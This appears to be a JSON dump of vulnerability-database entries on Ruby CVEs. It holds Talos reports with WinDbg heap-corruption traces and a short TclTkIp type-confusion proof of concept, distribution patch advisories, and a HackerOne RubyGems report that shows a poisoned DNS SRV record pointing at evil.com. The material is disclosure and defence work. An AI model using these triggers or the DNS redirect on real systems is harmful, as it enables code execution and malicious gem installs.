Defaulted to export symbols for C: \n \\Ruby22\\bin\\msvcrt-ruby220.dll -\n eax=70a42270 ebx=70a4b068 ecx=70a40000 edx=70a40000 esi=70a4b4ed edi=64105061\n eip=70a42270 esp=0028ee5c ebp=0028f2d8 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n fiddle!Init_fiddle:\n 70a42270 55 push ebp\n 0:000> bp 70A42ADD \".printf \\\" xcalloc( 0x%x )\\\",edx;.echo;g \"\n 0:000> bp 70A42AE2 \".printf \\\"arg_types addr : 0x%x\\\",eax;.echo\"\n 0:000> g\n \n Start\n args array size : 1\n xcalloc( 0x2 )\n arg_types addr : 0x2b81b50\n \n eax=02b81b50 ebx=00000000 ecx=75e2f489 edx=00000018 esi=00000003 edi=0035003c\n eip=70a42ae2 esp=0028f7a0 ebp=0028f808 iopl=0 nv up ei pl nz na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206\n fiddle!Init_fiddle+0x872:\n 70a42ae2 89c7 mov edi,eax\n 0:000> !heap -p -a 0x2b81b50\n address 02b81b50 found in\n _HEAP @ 510000\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\n 02b81b48 0004 0000 [00] 02b81b50 00008 - (busy)\n \n \n 0:000> !heap -p -a 02b81b48+20 \n address 02b81b68 found in\n _HEAP @ 510000\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\n 02b81b68 0290 0000 [00] 02b81b70 01478 - (free)\n \n \n 0:000> dd 02b81b48+20\n 02b81b68 fad1ca73 000ae511 005100c4 00514668\n 02b81b78 feeefeee feeefeee feeefeee feeefeee\n 02b81b88 feeefeee feeefeee feeefeee feeefeee\n 02b81b98 feeefeee feeefeee feeefeee feeefeee\n 02b81ba8 feeefeee feeefeee feeefeee feeefeee\n 02b81bb8 feeefeee feeefeee feeefeee feeefeee\n 02b81bc8 feeefeee feeefeee feeefeee feeefeee\n 02b81bd8 feeefeee feeefeee feeefeee feeefeee\n 0:000> g\n \n increase size of array\n New args array size is : 11\n \n HEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f969 esi=02b81b48 edi=00000008\n eip=77b9087c esp=0028fbb0 ebp=0028fbb0 iopl=0 nv up ei pl nz na po 
nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> !heap -p -a 02b81b48+20\n address 02b81b68 found in\n _HEAP @ 510000\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\n 02b81b68 b8ab 0000 [00] 02b81b70 4c66a - (busy)\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \n \\Ruby22\\bin\\libffi-6.dll -\n libffi_6!ffi_type_pointer\n \n \n 0:000> !heap -x 02b81b48+20\n ERROR: Block 02b81b68 previous size 955d does not match previous block size 4\n HEAP 00510000 (Seg 02af0000) At 02b81b68 Error: invalid block Previous\n \n 0:000> dd 02b81b48+20\n 02b81b68 6b747048 6b747048 6b747048 6b747048\n 02b81b78 6b747048 00000000 00000003 00000003\n 02b81b88 00000003 00000003 00000003 00000003\n 02b81b98 00000003 baadf00d baadf00d baadf00d\n 02b81ba8 baadf00d baadf00d baadf00d baadf00d\n 02b81bb8 baadf00d baadf00d abababab abababab\n 02b81bc8 00000000 00000000 66d2c8ee 180ae518\n 02b81bd8 02b6c4d0 02b6c4d0 02b6c4d0 02b6c4d0\n 0:000> g\n HEAP[ruby.exe]: Invalid address specified to RtlSizeHeap( 00510000, 02B81B50 )\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f985 esi=00510000 edi=02b81b50\n eip=77b9087c esp=0028fbcc ebp=0028fbcc iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> g\n HEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f871 esi=02b81b48 edi=00000008\n eip=77b9087c esp=0028fab8 ebp=0028fab8 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> g\n HEAP[ruby.exe]: Invalid address specified to RtlFreeHeap( 00510000, 02B81B50 
)\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f88d esi=00510000 edi=00510000\n eip=77b9087c esp=0028fad4 ebp=0028fad4 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> g\n eax=00000000 ebx=00000000 ecx=0028f88c edx=0028f88d esi=77bc2100 edi=77bc20c0\n eip=77adfd0e esp=0028fe40 ebp=0028fe5c iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\n ntdll!ZwTerminateProcess+0x12:\n 77adfd0e 83c404 add esp,4\n 0:000>\n \n\n### TIMELINE\n\n2015-06-11 - Initial Discovery \n2015-06-30 - Vendor Notification \n2016-06-14 - Public Disclosure \n\n\n##### Credit\n\nDiscovered by Marcin \u2018Icewall\u2019 Noga of Cisco Talos\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-14T00:00:00", "type": "talos", "title": "Ruby Fiddle::Function.new Heap Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2016-06-14T00:00:00", "id": "TALOS-2016-0034", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0034", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:57", "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0031\n\n## Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities\n\n##### June 14, 2016\n\n##### CVE Number\n\nCVE-2016-2337\n\n### DESCRIPTION\n\nType Confusion exists in _cancel_eval Ruby\u2019s TclTkIp class method. Attacker passing different type of object than String as \u201cretval\u201d argument can cause arbitrary code execution.\n\n### TESTED VERSIONS\n\nRuby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later\n\n### PRODUCT URLs\n\nhttps://www.ruby-lang.org\n\n### DETAILS\n\nVulnerable code:\n \n \n ---------------------------------------------- code \n ---------------------------------------------\t\n Line 7761\tstatic VALUE\n Line 7762\tip_cancel_eval(argc, argv, self)\n Line 7763\tint argc;\n Line 7764\tVALUE *argv;\n Line 7765\tVALUE self;\n Line 7766\t{\n Line 7767\t\tVALUE retval;\n Line 7768\n Line 7769\t\tif (rb_scan_args(argc, argv, \"01\", &retval) == 0) {\n Line 7770\t\t\tretval = Qnil;\n Line 7771\t\t}\n Line 7772\t\tif (ip_cancel_eval_core(get_ip(self)->ip, retval, 0) == \n TCL_OK) {\n Line 7773\t\t\treturn Qtrue;\n Line 7774\t\t} else {\n Line 7775\t\t\treturn Qfalse;\n Line 7776\t\t}\n Line 7777\t}\n \n Line 7736\tstatic int\n Line 7737\tip_cancel_eval_core(interp, msg, flag)\n Line 7738\tTcl_Interp *interp;\n Line 7739\tVALUE msg;\n Line 7740\tint flag;\n Line 7741\t{\n Line 7742\t#if TCL_MAJOR_VERSION < 8 || (TCL_MAJOR_VERSION == 8 && \n TCL_MINOR_VERSION < 6)\n Line 7743\t\trb_raise(rb_eNotImpError,\n Line 7744\t\t\t\t \"cancel_eval is supported Tcl/Tk8.6 or \n later.\");\n Line 7745\n Line 7746\t\tUNREACHABLE;\n Line 7747\t#else\n Line 7748\t\tTcl_Obj *msg_obj;\n Line 7749\n Line 
7750\t\tif (NIL_P(msg)) {\n Line 7751\t\t\tmsg_obj = NULL;\n Line 7752\t\t} else {\n Line 7753\t\t\tmsg_obj = Tcl_NewStringObj(RSTRING_PTR(msg), \n RSTRING_LEN(msg));\n Line 7754\t\t\tTcl_IncrRefCount(msg_obj);\n Line 7755\t\t}\n Line 7756\n Line 7757\t\treturn Tcl_CancelEval(interp, msg_obj, 0, flag);\n Line 7758\t#endif\n Line 7759\t}\n ---------------------------------------------- code \n ---------------------------------------------\t\n \n\nIn line 7769 the \u201c_cancel_eval\u201d method argument is parsed into the \u201cretval\u201d variable. This variable is then passed to the \u201cip_cancel_eval_core\u201d function (line 7772). In line 7753 the \u201cretval\u201d variable, passed to this function as the \u201cmsg\u201d argument, is treated as a String object. Passing an object of a type other than String causes type confusion at this line.\n\n### POC\n \n \n ---------------------------------- PoC test.rb ----------------------------------------\n \n require 'tk'\n t = TclTkIp.new()\n t._cancel_eval(0x11223344)\n \n ---------------------------------- PoC test.rb ----------------------------------------\n \n\n### TIMELINE\n\n2015-06-18 - Initial Discovery \n2015-06-30 - Vendor Notification \n2016-06-14 - Public Disclosure \n\n\n##### Credit\n\nDiscovered by Marcin \u2018Icewall\u2019 Noga of Cisco Talos\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-14T00:00:00", "type": "talos", "title": "Ruby TclTkIp ip_cancel_eval Type Confusion 
Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2016-06-14T00:00:00", "id": "TALOS-2016-0031", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2017-04-28T17:19:07", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues:\n\n Security issues fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new \"initialize\" (bsc#1018808)\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n - CVE-2015-3900: hostname validation does not work when fetching gems or\n making API requests (bsc#936032)\n - CVE-2015-1855: Ruby's OpenSSL extension suffers a vulnerability through\n overly permissive matching of hostnames (bsc#926974)\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes()\n function (bsc#887877)\n\n Bugfixes:\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment\n variable properly (bsc#1014863)\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n - Ruby: HTTP Header injection in 'net/http' (bsc#986630)\n\n ChangeLog:\n - http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "cvss3": {}, "published": "2017-04-28T18:11:28", "type": 
"suse", "title": "Security update for ruby2.1 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2014-4975"], "modified": "2017-04-28T18:11:28", "id": "OPENSUSE-SU-2017:1128-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00034.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-20T11:18:41", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues:\n\n Security issues fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new \"initialize\" (bsc#1018808)\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n - CVE-2015-3900: hostname validation does not work when fetching gems or\n making API requests (bsc#936032)\n - CVE-2015-1855: Ruby's OpenSSL extension suffers a vulnerability through\n overly permissive matching of hostnames (bsc#926974)\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes()\n function (bsc#887877)\n\n Bugfixes:\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment\n variable properly (bsc#1014863)\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n - Ruby: HTTP Header injection in 'net/http' (bsc#986630)\n\n ChangeLog:\n - http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\n", "cvss3": {}, "published": "2017-04-20T12:08:57", "type": "suse", "title": "Security update for ruby2.1 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2014-4975"], "modified": "2017-04-20T12:08:57", "id": "SUSE-SU-2017:1067-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00024.html", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-03T19:17:43", "description": "This update for ruby19 fixes the following issues:\n\n Security issue fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new \"initialize\" (bsc#1018808)\n\n Bugfixes:\n - fix small mistake in the backport for (bsc#986630)\n - HTTP Header injection in 'net/http' (bsc#986630)\n - make the testsuite work with our new openssl requirements\n\n", "cvss3": {}, "published": "2017-04-03T21:09:44", "type": "suse", "title": "Security update for ruby19 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2017-04-03T21:09:44", "id": "SUSE-SU-2017:0914-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00006.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:LOW/I:LOW/A:LOW/"}}, {"lastseen": "2017-04-05T13:17:48", "description": "This update for ruby2.2, ruby2.3 fixes the following issues:\n\n Security issues fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new \"initialize\" (boo#1018808)\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (boo#959495)\n\n Detailed ChangeLog:\n - http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\n - http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\n\n", "cvss3": {}, "published": "2017-04-05T15:08:17", "type": "suse", "title": "Security update for ruby2.2, ruby2.3 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2339", "CVE-2015-7551"], "modified": "2017-04-05T15:08:17", "id": "OPENSUSE-SU-2017:0933-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00007.html", "cvss": {"score": 6.4, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:LOW/I:LOW/A:LOW/"}}], "debiancve": [{"lastseen": "2021-12-14T17:52:31", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "debiancve", "title": "CVE-2016-2337", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2017-01-06T21:59:00", "id": "DEBIANCVE:CVE-2016-2337", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:52:31", "description": "An exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "debiancve", "title": "CVE-2016-2339", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2017-01-06T21:59:00", "id": "DEBIANCVE:CVE-2016-2339", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-22T01:58:34", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2015-06-24T14:59:00", "type": "debiancve", "title": "CVE-2015-3900", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-06-24T14:59:00", "id": "DEBIANCVE:CVE-2015-3900", "href": "https://security-tracker.debian.org/tracker/CVE-2015-3900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-16T22:37:08", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.4.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\" NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2015-08-25T17:59:00", "type": "debiancve", "title": "CVE-2015-4020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-08-25T17:59:00", "id": "DEBIANCVE:CVE-2015-4020", "href": "https://security-tracker.debian.org/tracker/CVE-2015-4020", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "RubyGems is the Ruby standard for 
publishing and managing third party libraries. ", "cvss3": {}, "published": "2015-08-11T02:06:59", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygems-2.4.8-100.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-08-11T02:06:59", "id": "FEDORA:0FC496087B07", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JGCFID4WQLY54U45Y244GHRRBLMZCWHH/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. 
", "cvss3": {}, "published": "2015-08-19T08:17:15", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: rubygems-2.2.5-100.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-08-19T08:17:15", "id": "FEDORA:4A0D661A5EC1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SIV3IWPXRK4PXKEI3KJGDGFRBB43WM4M/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. 
", "cvss3": {}, "published": "2015-08-10T10:06:28", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygems-2.4.8-100.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-08-10T10:06:28", "id": "FEDORA:B90ED608757D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/CKGU7HSXPWYLG53X4GRRZHM5MWPE3AP2/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2023-05-26T02:21:32", "description": "Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA flaw was found in a way rubygems verified the API endpoint hostname\nretrieved through a DNS SRV record. A man-in-the-middle attacker could use\nthis flaw to force a client to download content from an untrusted domain.\n(CVE-2015-3900)\n\nAll rh-ruby22-ruby users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
All running\ninstances of Ruby need to be restarted for this update to take effect.\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "redhat", "title": "(RHSA-2015:1657) Important: rh-ruby22-ruby security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2018-06-12T21:28:16", "id": "RHSA-2015:1657", "href": "https://access.redhat.com/errata/RHSA-2015:1657", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2023-09-03T23:36:50", "bounty": 0.0, "description": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-007/?fid=6356", "cvss3": {}, "published": "2015-05-06T00:00:00", "type": "hackerone", "title": "RubyGems: Request Hijacking Vulnerability In RubyGems 2.4.6 And Earlier", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-05-14T00:00:00", "id": "H1:103993", "href": "https://hackerone.com/reports/103993", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": 
"2023-09-03T22:02:33", "bounty": 0.0, "description": "**Description:**\n\nThe RubyGems client supports a gem server API discovery functionality,\nwhich is used when pushing or pulling gems to a gem distribution/hosting\nserver, like RubyGems.org. This functionality is provided via a SRV DNS\nrequest to the users gem source hostname prepended with \"_rubygems._tcp.\".\nThe response to this request tells the RubyGems client (aka: the gem\ncommand) where the users gem server API is. In the default RubyGems\nscenario, with a gem source of https://rubygems.org, the users SRV DNS\nrequest and reply will look like this:\n\n ~ $ dig srv _rubygems._tcp.rubygems.org +short\n 0 1 80 api.rubygems.org.\n\nDue to a deficiency in DNS response verification, a MiTM positioned \nattacker can poison the DNS response to this record response and force\nthe client to unknowingly download and install Ruby gems from an attacker\ncontrolled gem server in an alternate security domain. An example of\nsuch a scenario would look like so:\n\n ~ $ dig _rubygems._tcp.rubygems.org SRV +short\n 0 0 53 evil.com/api.rubygems.com.\n\nIn such a scenario, the attacker is able to serve the client malicious gem\ncontent, resulting in trivial remote code execution scenarios. 
